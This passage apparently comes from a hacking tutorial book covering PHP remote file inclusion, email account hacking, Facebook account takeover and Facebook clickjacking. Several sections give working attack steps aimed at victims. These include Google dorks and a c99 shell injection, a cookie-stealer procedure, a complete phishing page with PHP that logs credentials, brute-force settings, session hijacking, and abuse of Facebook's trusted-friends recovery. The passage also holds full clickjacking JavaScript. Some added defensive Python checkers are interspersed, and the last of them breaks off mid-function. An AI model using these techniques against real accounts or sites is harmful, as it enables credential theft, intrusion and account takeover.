Remote file inclusion (RFI) is a type of vulnerability often found on PHP websites. It allows an attacker to make the server include, and execute, a file from a remote location, usually through a script on the web server that passes a user-supplied value to include() or require(). The vulnerability occurs due to improper validation of user-supplied input.

Google dorks to find vulnerable websites

inurl:home.php?page=
inurl:index.php?page=
inurl:view.php?page=
inurl:contact.php?name=

Visit the link given below for the full list: http://www.alboraaq.com/forum/abh50250/

How to identify the vulnerability in a website

First of all, select any search result generated by a Google dork, then put www.google.com after the "=". If the Google search engine page is rendered inside the web page, the site is telling you "I am vulnerable, hack me".


Example:
www.site.com/contact.php?name=www.google.com/

How to exploit the vulnerability

Once you have found a vulnerable website, upload a c99 shell to any free web hosting service (I prefer www.my3gb.com). We can download the c99 shell from www.hcf.co.in/downloads. Store it with a .txt extension rather than .php, otherwise the free host runs the PHP itself and the target only receives its output. After uploading the c99 shell to the server, get the shell link (e.g. www.my3gb.com/name.txt) and put the shell URL after the "=". The vulnerable page will include and execute the shell. Once the c99 shell is running on the site, "the website will be all yours".

Example:
www.site.com/contact.php?name=www.my3gb.com/name.txt

Vulnerability scanners

(1) fimap

fimap is a small Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps. fimap is similar to sqlmap, just for LFI/RFI bugs instead of SQL injection. It is currently under heavy development but it's usable.

Features

Check a single URL, a list of URLs, or Google results fully automatically.
Can identify and exploit file inclusion bugs.
Test and exploit multiple bugs.

Download Link: http://code.google.com/p/fimap/

(2) Uniscan

Uniscan is a remote code execution and RFI vulnerability scanner used to scan web applications for RFI/LFI bugs.

Download Link: http://sourceforge.net/projects/uniscan/files/latest/download

Exploitation tools:

fimap is also used for exploitation of RFI/LFI bugs in web applications: it first scans the web app for bugs and then exploits them.

Download Link: http://code.google.com/p/fimap/


Countermeasures:

If you are developing a web application:

(1) Use proper input validation: accept only an allowlisted set of page names rather than paths or URLs.
(2) Sanitize the input value properly: reject anything containing a scheme such as http://, a slash, or "..".
(3) Keep your web application updated with security updates.
(4) Disable allow_url_fopen and allow_url_include in php.ini.
(5) Keep your support lists private; they may leak information about reported vulnerabilities to outside users.
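The identification test above (www.google.com after the "=") and countermeasures (1) and (2), turned into two checks in Python as an added example rather than the book's or PHP's own code: a detector for URL-shaped values where a page name is expected, and an allowlist resolver that builds the include path server-side. The template directory and page names are assumptions; in PHP the same logic sits in front of include().

```python
import re
from urllib.parse import urlsplit

# Constructed layout: the only pages contact.php?name= may include (assumption).
TEMPLATE_DIR = "/var/www/templates"
ALLOWED_PAGES = {"home", "contact", "view"}
SAFE_NAME = re.compile(r"^[a-z][a-z0-9_]{0,31}$")

# Stream wrappers PHP will fetch or execute when allow_url_include is on.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "file"}


def is_remote_inclusion_attempt(value):
    """Flags the two shapes the chapter uses: a full URL (http://host/c99.txt,
    php://input) and the bare host form (www.google.com/, www.my3gb.com/name.txt).
    Useful both as an input filter and as a log-scanning rule."""
    v = value.strip().lower()
    if urlsplit(v).scheme in REMOTE_SCHEMES:
        return True
    return re.match(r"^(www\.)?[a-z0-9-]+(\.[a-z0-9-]+)+(/|$)", v) is not None


def resolve_include(value):
    """Allowlist dispatch: the parameter picks a name from ALLOWED_PAGES and the
    server builds the path itself, so URLs, slashes and '..' never reach
    include(). Returns the path to include, or None to refuse the request."""
    if not SAFE_NAME.match(value) or value not in ALLOWED_PAGES:
        return None
    return TEMPLATE_DIR + "/" + value + ".php"


if __name__ == "__main__":
    for candidate in ["contact", "www.google.com/", "http://www.my3gb.com/name.txt",
                      "php://input", "../../etc/passwd"]:
        print(f"{candidate!r:40} remote={is_remote_inclusion_attempt(candidate)!s:5} "
              f"include={resolve_include(candidate)}")
```

The allowlist is the real control: once the parameter can only select a name from a fixed set, disabling allow_url_include (countermeasure 4) is defence in depth rather than the only thing standing between the attacker and a shell.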


Chapter 10 Email account hacking & security

Objectives:

Vulnerabilities in email services
Techniques used in email hacking
Email account security measures
Password recovery tools


An email address is the address given by an email service provider to a user for transporting messages between two users. Email is a widely used service for companies and individuals, and a great deal of communication takes place through email accounts alone. If someone gets access to your email account, confidential information can end up in the wrong hands, which can be very harmful for the victim. Yahoo, Gmail and Hotmail are the most used email services, and IMAP and POP3 are the protocols used to fetch mail from them. We will discuss the hacking and security of these email accounts in the next few pages.

Vulnerabilities in email services

While using a web-based email service, when you click a link in an email body the browser sends the URL of the current page (the webmail URL) to the linked site as the Referer header. This information passes through third-party web servers, and the URL can include:

Email address
Login ID
Actual name


Techniques used in email Hacking

There are 4 techniques used for email account hacking.(1)By answering security question & Social Engineering(2)By stealing cookies from victim’s web browser.(3)By Phising(4)By password Bruteforcing

(1)By answering security question & Social Engineering

Security question set up by user while creating email account. It is used to recover lostpassword. Once we correctly answer the security question set by user then we can requestfor new password from server. Now we can access to the victim inbox by using newpassword.

Social Engineering is an art of manipulation to retrieve confidential information from anyhuman. If the victim user closes to us then we can easily find out correct answer ofquestion by using very less effort. If we don’t know the user then we have to make someextra effort but If you are perfect in mind game then no one can beat you, There is nosecurity tool developed which protect from social engineering attack.

For Gmail

Recovery page URL: https://www.google.com/accounts/recovery

For Yahoo

Recovery page URL: https://edit.india.yahoo.com/forgot


For Hotmail

Recovery page URL: https://account.live.com/ResetPassword.aspx

(2) By stealing cookies from the user's web browser

The web browser stores user authentication information in encrypted form, known as a cookie. When the victim accesses an email account in the web browser, the browser stores the information for each login as a cookie (when cookies are enabled in the victim's browser). If we can get access to the victim's browser cookies, we may be able to hack his email accounts. A cookie stealer is used for this purpose; it is a script written in PHP.

How the Hack Begins?

This technique works for every email service. We have to download a cookie logger script before proceeding to the next step. The cookie logger script is available from http://www.ziddu.com/download/13227521/cookiestealer.zip.html. After downloading the file, upload the cookie stealer to any web hosting server (for example 110mb.com). Create the file "log.txt" and chmod it to 777, then send the cookie stealer URL (for example www.110mb.com/hmalviya9/cookie.php) to the victim user. It will capture all the cookies from the victim's browser when he clicks on the link.

(3) By phishing

This technique also works for all email services. Phishing is the process of making a clone of a web page; the clone page is called a phisher. We have to create a clone of the email login page and send it to the victim. Once the victim logs in through the phisher page, the login authentication information is sent to the attacker. An attacker manages to send the clone page to the victim by using social engineering techniques.

How to make a clone of an email account login page

A clone page is also known as a hoax page. First of all, go to the desired email account login page.
For Gmail -> https://www.gmail.com/login
Yahoo -> https://www.login.yahoo.com
Hotmail -> https://www.login.live.com

Save the page as HTML and open it in Notepad, then go to View -> Find and enter action=" in the Find dialog box.

For Gmail -> Replace action="https://www.gmail.com/login" with action="next.php"
For Yahoo -> Replace action="https://www.login.yahoo.com" with action="next.php"
For Hotmail -> Replace action="https://www.login.live.com" with action="next.php"

Change the form method from POST to GET, then save the file as index.php.

Code of next.php

<?php
// Only one of the three header() lines should remain: the one for the service
// being cloned. PHP sends the last Location header it sets.
header("Location: https://www.gmail.com/login "); # For Gmail
header("Location: https://www.login.yahoo.com "); # For Yahoo
header("Location: https://www.login.live.in "); # For Hotmail
$handle = fopen("passwords.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Make a blank text file and save it as passwords.txt. Now we have to upload index.php, next.php and passwords.txt to any free hosting website (I prefer my3gb.com). Here index.php is our clone page, which we have to send to the victim. Once the victim logs in through the hoax page, the login information will automatically be written to passwords.txt. Suppose our clone page address is my3gb.com/malviya/index.php; then we have to send this page to the victim in order to hack the email account. Use some social engineering techniques to make the attempt more effective.

Defense against phishing attacks

To defend against phishing scams, install the Netcraft anti-phishing toolbar in your browser from http://toolbar.netcraft.com/.
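The clone recipe above leaves two fingerprints in the saved page: the form's action now points at a script on the attacker's host, and its method is GET. The following check, an added example that is not part of the book, parses a login page and flags exactly those changes; the host names and HTML snippets are constructed placeholders, not real providers' login endpoints.

```python
"""Flag login forms that behave like the cloned phishing pages described above.

A form containing a password field is suspicious when its action resolves to
a host other than the legitimate login host, when its method is GET (credentials
would travel in the query string), or when it submits over plain http.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urljoin, urlsplit


class LoginFormCollector(HTMLParser):
    """Collect every <form> and remember whether it contains a password input."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict[str, object]] = []
        self._current: Optional[Dict[str, object]] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def check_login_forms(html: str, page_url: str, legit_hosts: List[str]) -> List[str]:
    """Return one warning per suspicious credential form; an empty list means nothing found."""
    collector = LoginFormCollector()
    collector.feed(html)
    warnings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue  # not a credential form, ignore it
        # A relative action such as "next.php" resolves against the page's own URL.
        target = urljoin(page_url, str(form["action"]))
        parts = urlsplit(target)
        if parts.hostname not in legit_hosts:
            warnings.append(f"password form posts to unexpected host {parts.hostname} ({target})")
        if form["method"] != "post":
            warnings.append(f"password form uses {str(form['method']).upper()}: credentials would appear in the URL")
        if parts.scheme != "https":
            warnings.append(f"password form submits over {parts.scheme}, not https")
    return warnings


# Constructed samples: "login.example-mail.test" stands in for a real provider's login host.
LEGIT_HOSTS = ["login.example-mail.test"]

GENUINE_PAGE = """<html><body>
<form action="https://login.example-mail.test/auth" method="post">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form></body></html>"""

# The same page after the "action=next.php" and "method=GET" edits described above.
CLONED_PAGE = """<html><body>
<form action="next.php" method="GET">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form></body></html>"""

if __name__ == "__main__":
    print(check_login_forms(GENUINE_PAGE, "https://login.example-mail.test/", LEGIT_HOSTS))
    print(check_login_forms(CLONED_PAGE, "http://free-host.test/malviya/index.php", LEGIT_HOSTS))
```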

(4) By password brute-forcing

We can crack the password of a Yahoo email account by using a wordlist and the brute-forcing method. Gmail and Hotmail accounts cannot be brute-forced. We use the Brutus tool for brute-forcing Yahoo email account passwords.

Brutus download (official): http://www.hoobie.net/brutus/brutus-download.html

We can put Brutus on a flash drive and run it from there; it is a portable program and requires no installation. It can also be run under WineHQ on Linux (I have personally tested this).

Open Brutus and configure it as follows:

The following settings must be set up:


* Target: pop3.yahoo.com
* Attack type: POP3
* Connections: 60 (all the way)
* Timeout: 60 (all the way)
* Try to stay connected: all the way
* Single user: put the email address to attack here
* I would suggest using a proxy (search Google for one; they are normally in IP:PORT format)

If you don't already have a good wordlist, you can grab mine from here: http://www.ziddu.com/download/8565751/PasswordDictionary.zip.html

Basically it will just attempt every password in the dictionary until it finds the right one.

If the dictionary attack fails, we can also attempt a brute-force attack (also called a cryptanalysis attack), in which it goes through and guesses every possible string combination.

# A Gmail account password cannot be brute-forced because Gmail uses a CAPTCHA during the authentication process.

Email Account Security Measures

(1) The best way to protect an email account from hackers is to use a strong password. A strong password contains upper-case letters, lower-case letters, numbers and special characters. Build a password from a phrase such as "Mary had a little lamb. The lamb had white fleece."
Take the first letter of each word, e.g. MHALLTLHWF.
Put every second letter of the abbreviation in lower case.
Replace "A" with "@" and "L" with "!". A new password is thus formed which contains more than 8 characters.
New password: Mh@!Lt!hWf

(2) Use a sign-in seal (for Yahoo users); the sign-in seal protects users from phishing scams.

(3) Set an alternate email address during signup; a lost password can be recovered through the alternate email address.

(4) Set your mobile number during signup; it helps you recover your account.

(5) Never select the option "keep me signed in" or "remember me" at login. If you select this option, your account will open automatically the next time on the same computer.


(6) Use email security tools (Email Protector, SuperSecret).

Download link for Email Protector: http://www.softpedia.com/get/Internet/E-mail/Mail-Utilities/Email-Protector.shtml
Download link for SuperSecret: http://download.cnet.com/SuperSecret/3000-18501_4-91956.html

Password Recovery Tools

Mail PassView: a small recovery tool that reveals passwords and other account details for Yahoo, Gmail, Hotmail, Outlook and other email clients.

Download Link: http://majorgeeks.com/Mail_PassView_d3860.html

Mail Password: a universal password recovery tool for POP3 email accounts.
Download Link: http://download.cnet.com/Email-Password-Recovery-Master/3000-18501_4-10641123.html

Password revealer JavaScript: this JavaScript is used to reveal login information hidden behind asterisks (*****). We just have to enter the script in the address bar, and it reveals the password hidden behind the asterisks within a minute.

Code: javascript: alert(document.getElementById('Passwd').value);


Chapter 11 Facebook account hacking & security

Objectives:

Facebook account hacking using Wireshark
Facebook account hacking using Firesheep
Facebook account hacking using recovery options
Facebook account security countermeasures


Facebook is one of the most widely used social networking websites, with more than 750 million users, which is the reason it has become a hot target for all hackers.

How to hack anyone's Facebook account when both victim and attacker are using the same network?

(1) Using Wireshark

First of all I must make clear that even though you'll get access to the victim's account, you'll not get his/her password; next, this trick will work only on a LAN with a hub.

For this hack you'll need Wireshark, which is a packet sniffing tool, the Mozilla Firefox web browser and the Add N Edit Cookies add-on for Mozilla Firefox. Now I assume you have all of the above components for hacking Facebook and you are connected to a hub-based LAN or a LAN which has been ARP poisoned. So now click on the capture button and start capturing packets.

Now, using a command-line shell, ping www.facebook.com to get its IP address, filter all IP packets having the IP address of www.facebook.com and search for the HTTP protocol followed by GET /home.php. This may vary depending on region and time zone, but don't bother; try to search all packets with HTTP GET for cookies.

Now from the packet details window expand the packet information for the above packet and you'll get 8-10 different cookies that are stored by www.gmail.com on the victim's PC. Right-click and copy all the cookie names and values into Notepad.

Now open Mozilla Firefox, browse to Tools and open the cookie editor. Add each cookie to your cookie store using the cookie editor.

Now close the cookie editor and open Gmail; you'll find yourself logged into the victim's account.

Defense against this attack:

A system administrator should use tools for countering sniffing. Don't log in to your accounts if you know your LAN is not protected, and if you must log in, use a tunnelled connection.

Download Wireshark from http://www.wireshark.org/. Download Add N Edit Cookies from Mozilla Add-ons.
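The sniffing attack works because the session cookies are sent over plain HTTP and can be replayed from another browser. A site defends against that on its own side by marking session cookies Secure (never sent over HTTP, so nothing for a LAN sniffer to see) and HttpOnly. The script below is an added example, not part of the book: it audits Set-Cookie headers for those attributes; the header block it parses is constructed, not captured from any real site.

```python
"""Audit Set-Cookie headers for the attributes that blunt session hijacking."""
from typing import Dict, List


def parse_set_cookie(header_value: str) -> Dict[str, object]:
    """Parse one Set-Cookie value into its name, value and a lower-cased attribute map."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(header_value: str, over_https: bool) -> List[str]:
    """Return the weaknesses of one Set-Cookie header; an empty list means it is fine."""
    attrs = parse_set_cookie(header_value)["attrs"]
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure: cookie is sent over plain HTTP and can be sniffed")
    elif not over_https:
        # A Secure cookie set by an HTTP page is useless: the browser will never send it.
        problems.append("Secure set but page served over HTTP: browser will never send it")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: readable by page scripts")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        problems.append("SameSite not Lax/Strict: sent on cross-site requests")
    if "expires" in attrs or "max-age" in attrs:
        # Persistent session cookies are what "keep me signed in" produces.
        problems.append("persistent cookie: survives browser restart ('keep me signed in')")
    return problems


def audit_response(raw_headers: str, over_https: bool = True) -> Dict[str, List[str]]:
    """Audit every Set-Cookie line in a raw header block, keyed by cookie name."""
    report: Dict[str, List[str]] = {}
    for line in raw_headers.splitlines():
        header, _, value = line.partition(":")
        if header.strip().lower() == "set-cookie":
            cookie_name = str(parse_set_cookie(value)["name"])
            report[cookie_name] = audit_cookie(value, over_https)
    return report


# Constructed sample response headers (not captured from any real site).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123; Path=/
Set-Cookie: c_user=1000; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT
Set-Cookie: xs=deadbeef; Path=/; Secure; HttpOnly; SameSite=Lax
"""

if __name__ == "__main__":
    for name, problems in audit_response(SAMPLE_HEADERS).items():
        print(f"{name}: {'OK' if not problems else '; '.join(problems)}")
```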

(2) Using Firesheep

Firesheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities in a sidebar displayed in the browser and allows the user to instantly take on the login credentials of the user by double-clicking on the victim's name.

Things we need:

1. Firefox Browser

2. Firesheep Firefox plugin

Procedure:

1. First download and install the Firefox browser and the Firesheep add-on.

2. Open Firefox, click the (1) View menu, then select (2) Sidebar and finally click (3) Firesheep, or simply press Ctrl+Shift+S to open Firesheep.

3. Now you can see Firesheep has opened in the sidebar. Select your interface by going to Preferences as shown.

4. Now click on the Start Capturing button and wait for a while.

5. Now you can see different pre-authenticated sessions in the sidebar; select the session you want.

6. Now you will be automatically logged into the victim's account. You can use this tool to hack Facebook/Twitter accounts.

How to hack anyone's Facebook account when victim and attacker are using different networks?

Phishing and cookie stealing can work in this case, as I discussed before in the email hacking section (see page no.


Hacking a Facebook account password using the recovery option

Facebook has introduced a feature for "recovering a password using trusted friends". With this feature, if we have lost our Facebook account password, Facebook will send a security code to three friends. We have to ask those three friends for the security codes, and after entering them we can reset the Facebook password.

So, in this hack, we use this feature for hacking a Facebook account password. You have to create three fake accounts and make sure that your victim adds them as his friends, so that your three fake accounts are listed in your victim's friends list. Now, if we use the above "trusted friends" feature for resetting the victim's Facebook password, Facebook will send the security codes to our three fake accounts and we can easily hack the Facebook account. You can use social engineering skills so that your victim has no doubts while accepting your fake account as his friend. This is the only tricky part of the hack.

Also, the fake accounts must be at least a week old. Once you are done with the fake accounts, move to the steps below.

Step 1.

Go to Facebook.com and click on the Forgot Password link to get this page:

Step 2.

You have to enter the email address of the victim, or even the Facebook profile name will do. Facebook will search for the profile name and you will be shown the account. Click on "This is my account".


Step 3.

On the next page, click on "No longer have access to these".

Step 4.

You will be prompted for an email address. Enter your email address here and click on "Submit".

Step 5.

Facebook will ask you to answer the security question. Use social engineering to find out the correct answer, or else you can go to the next step by entering three wrong answers (it is not certain that you will be prompted to the next step of recovery, because it depends on the account).

Step 6.

Now, if you are able to proceed, the next step is recovery through three friends. Here you have to select three friends from a random list generated by Facebook. It is not certain that your fake accounts will be in the list, but the possibility is always there.

Now we have to get the codes from all three accounts that were selected during the recovery process; after getting the codes we can set a new password. An email-address-change mail will be sent to the old associated email ID of the victim, and the account will be locked for 24 hours. Now it is the attacker's job to get access before the victim does, otherwise the victim can recover his account.
# The victim can easily recover his account by answering the security question. Once you have set a security question it cannot be changed.


Facebook account security countermeasures

Enable HTTPS protocol

Using HTTPS instead of plain HTTP means that you are securing the communication between the server and your computer. No one will be able to intercept the traffic between your computer and the server, so you can be sure that all the information delivered to and from your computer is protected in transit. Modern browsers highlight secure URLs with information about the certificate issuing authority. Here is a screenshot of secure Facebook open in Firefox:

To enable HTTPS, log in to your Facebook account and go to "Account -> Account Settings". Select Account Security under the Settings tab and check the box beside "Browse Facebook on a secure connection (https) whenever possible".

Use Facebook two-step authentication (Login Approvals)

Like Google, Facebook has also introduced a two-step authentication service called Login Approvals. This service lets you log in to your Facebook account by using your password plus a security authentication code sent to your mobile device. By enabling this service, you will no longer be able to log in to Facebook using only your password; you will always be required to use the password and the security code sent to your mobile device.

Checking for Facebook email phishing attacks and scams

While you are on Facebook, you should never click on suspicious links even if the messages were sent by your friends. Most Facebook scams spread by posting messages to the walls of all friends of the infected user. The best place to get updated news about Facebook scams is Facecrooks.com.

Enable Login notifications

Enabling login notifications in Facebook will notify you when someone logs in from a suspicious location or computer.

To enable login notifications, go to "Account -> Account Settings". Under the Settings tab expand "Account Security -> Login Notifications" and check the following two boxes:


Send me an email

Send me a text message

Use Facebook one time password service

Like Hotmail, Facebook also provides a one-time password facility. A one-time password is a temporary password which can only be used once and expires within 20 minutes of creation. To enable this service, you'll need to activate a phone number so that Facebook can send messages to your mobile. To register and activate a phone number, go to "Account -> Account Settings".


Chapter 12 Facebook Clickjacking

Objectives:

How it works
Mitigation
What we'll see in the future
Install it
Countermeasures


It allows setting up a website where users will "like" a page on Facebook without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) Facebook Like button underneath the mouse when the user hovers over a link.

How it works

Since we cannot inject CSS or JavaScript inside the Facebook iframe, we cannot change the cursor:pointer CSS property when the mouse is over the Like button, so it would be suspicious to have a page that always shows a clicking-hand mouse cursor. The workaround was making the Like button follow the mouse only when it is normal to have a clicking-hand cursor (cursor:pointer), such as when hovering over a link!

After clicking a link, the user will like the current page on Facebook and will in fact be redirected to the href (through JavaScript: document.location.href), and a cookie will be set so that the Facebook Like button no longer appears on future page loads.

Mitigation

The purpose of this script is to create a discussion about how to prevent clickjacking; by using this script for any reason other than security debugging you might be violating Facebook's Terms of Service and might lose your Facebook account.

As such, the code you have below is easily found on the web if you use it in your website, and I'll personally report you if you use it for malicious reasons.


What we’ll see in the future

Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it is possible to share a website not directly connected to where the Like button is placed, meaning I might place a Like button on fernandomagro.com that likes another website/domain.

So, it is possible to create a database of websites and generate a lot of different Like buttons consecutively on the same website.

Wrapping it all up, when Facebook clickjacking goes viral, I believe we will start seeing consecutive clickjacked likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: a gallery with 500 interesting pictures; imagine clicking through that gallery for 2 hours and then returning to Facebook and realizing the account was flooded with a huge number of unrequested likes.

Install it

I managed to wrap it all up in a JavaScript file that you just need to include to make it work in your web page.

Add the following to the head of your web page:

<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="clickjacking.js"></script>

Then, download the file from http://malviya.my3gb.com/clickjacking.js and put it in an accessible folder:

Code:

var $J = jQuery.noConflict();

// solve: images and floating divs
function heightestChild(elem) {
    var t = 0;
    var t_elem;
    $J("*", elem).each(function () {
        if ($J(this).outerHeight(true) > t) {
            t_elem = $J(this);
            t = t_elem.outerHeight(true);
        }
    });
    // we care about the highest
    if (elem.outerHeight(true) > t) {
        t = elem.outerHeight(true);
    }
    //return elem.outerHeight(true);
    return t + 3; // hotfix
}

function highestOffsetTop(elem) {
    var t = elem.offset().top;
    var t_elem;
    $J("*", elem).each(function () {
        if ($J(this).offset().top < t) {
            t_elem = $J(this);
            t = t_elem.offset().top;
        }
    });
    // we only care about the object that is most on top
    if (elem.offset().top < t) {
        t = elem.offset().top;
    }
    //return elem.offset().top;
    return t + 3;
}

// 57 19 63

$J(document).ready(function () {
    if (window.DO_CLICKJACKING) { // wrap up EVERYTHING
        /*$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/
        $J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');

        var elementWidth = 0;
        var elementHeight = 0;
        var theElement = '';
        var likeDone = 0;

        if ($J.cookie("clickjacking_" + escape(document.URL)) == 1) {
            likeDone = 1;
        }

        // fired when the user clicks a link (likes our page) -> clickjacking is done
        FB.Event.subscribe('edge.create', function (response) {
            $J("#clickjacking").css("display", "none");
            likeDone = 1;
            $J.cookie("clickjacking_" + escape(document.URL), "1");
            // let the user actually go to the link he clicked.
            window.location.href = theElement.attr('href');
        });

        $J(document).mousemove(function (event) {
            if (theElement != '') {
                if (event.pageY < (highestOffsetTop(theElement) - 4) ||
                    event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) ||
                    event.pageX < theElement.offset().left ||
                    event.pageX > (theElement.offset().left + theElement.width())) {
                    //alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top);
                    /* $J("#log").append("<p>mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + "</p>");
                    $J("#log").append("<p>mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement, true)) + "</p>");*/
                    theElement = ''; // the mouse is off theElement
                    $J("#clickjacking").css("display", "none");
                } else {
                    if ($J.browser.msie) {
                        $J("#clickjacking").css("top", (event.pageY - 15) + "px");
                        $J("#clickjacking").css("left", (event.pageX - 20) + "px");
                    } else {
                        $J("#clickjacking").css("top", (event.pageY - 5) + "px");
                        $J("#clickjacking").css("left", (event.pageX - 20) + "px");
                    }
                }
            }
        });

        $J(document).delegate("a", "mouseenter", function () {
            // register mouse is inside element
            if (likeDone == 0) {
                theElement = $J(this);
                $J("#clickjacking").css("display", "block");
            }
        });
    } // window.DO_CLICKJACKING
});

/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */

/**
 * Create a cookie with the given name and value and other optional parameters.
 *
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Set the value of a cookie.
 * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
 * @desc Create a cookie with all available options.
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Create a session cookie.
 * @example $.cookie('the_cookie', null);
 * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
 *       used when the cookie was set.
 *
 * @param String name The name of the cookie.
 * @param String value The value of the cookie.
 * @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
 * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
 *                             If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
 *                             If set to null or omitted, the cookie will be a session cookie and will not be retained
 *                             when the the browser exits.
 * @option String path The value of the path attribute of the cookie (default: path of page that created the cookie).
 * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
 * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
 *                        require a secure protocol (like HTTPS).
 * @type undefined
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/[email protected]
 */

/**
 * Get the value of a cookie with the given name.
 *
 * @example $.cookie('the_cookie');
 * @desc Get the value of a cookie.
 *
 * @param String name The name of the cookie.
 * @return The value of the cookie.
 * @type String
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/[email protected]
 */
jQuery.cookie = function (name, value, options) {
    if (typeof value != 'undefined') { // name and value given, set cookie
        options = options || {};
        if (value === null) {
            value = '';
            options.expires = -1;
        }
        var expires = '';
        if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
            var date;
            if (typeof options.expires == 'number') {
                date = new Date();
                date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
            } else {
                date = options.expires;
            }
            expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
        }
        // CAUTION: Needed to parenthesize options.path and options.domain
        // in the following expressions, otherwise they evaluate to undefined
        // in the packed version for some reason...
        var path = options.path ? '; path=' + (options.path) : '';
        var domain = options.domain ? '; domain=' + (options.domain) : '';
        var secure = options.secure ? '; secure' : '';
        document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
    } else { // only name given, get cookie
        var cookieValue = null;
        if (document.cookie && document.cookie != '') {
            var cookies = document.cookie.split(';');
            for (var i = 0; i < cookies.length; i++) {
                var cookie = jQuery.trim(cookies[i]);
                // Does this cookie string begin with the name we want?
                if (cookie.substring(0, name.length + 1) == (name + '=')) {
                    cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                    break;
                }
            }
        }
        return cookieValue;
    }
};

Now post the web page link on the victim's wall. When the victim clicks on the Like button, he will be redirected to your web page.

Countermeasures

(1) Don't click on shortened URLs (bit.ly, goo.gl, etc.).
(2) Don't click on nude or violent image and video links.
(3) Don't click on any application which has a domain different from facebook.com.
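The three rules above are user-side habits; the server-side complement, for any page that should never be rendered inside someone else's iframe, is the X-Frame-Options header or a Content-Security-Policy frame-ancestors directive, which makes browsers refuse to frame the page at all. The checker below is an added example, not code from the book or from the script's author: it parses both headers with browser precedence (CSP wins over X-Frame-Options) and reports whether an embedding origin would be allowed. The header blocks and origins are constructed placeholders.

```python
"""Check whether a page's response headers forbid framing (clickjacking defence)."""
from typing import Dict, List, Optional


def parse_headers(raw: str) -> Dict[str, str]:
    """Turn a raw header block into a lower-cased name -> value map (first value wins)."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() not in headers:
            headers[name.strip().lower()] = value.strip()
    return headers


def frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list from a CSP value, or None if the directive is absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def framing_allowed(raw_headers: str, page_origin: str, embedder_origin: str) -> bool:
    """Decide whether embedder_origin may frame the page.

    Browsers give CSP frame-ancestors precedence over X-Frame-Options; with
    neither header present, any site may frame the page. Only exact origins
    are matched here (host wildcards and scheme-only sources are not handled).
    """
    headers = parse_headers(raw_headers)
    sources = frame_ancestors(headers.get("content-security-policy", ""))
    if sources is not None:
        if "none" in sources:
            return False
        if "*" in sources:
            return True
        if "self" in sources and embedder_origin == page_origin:
            return True
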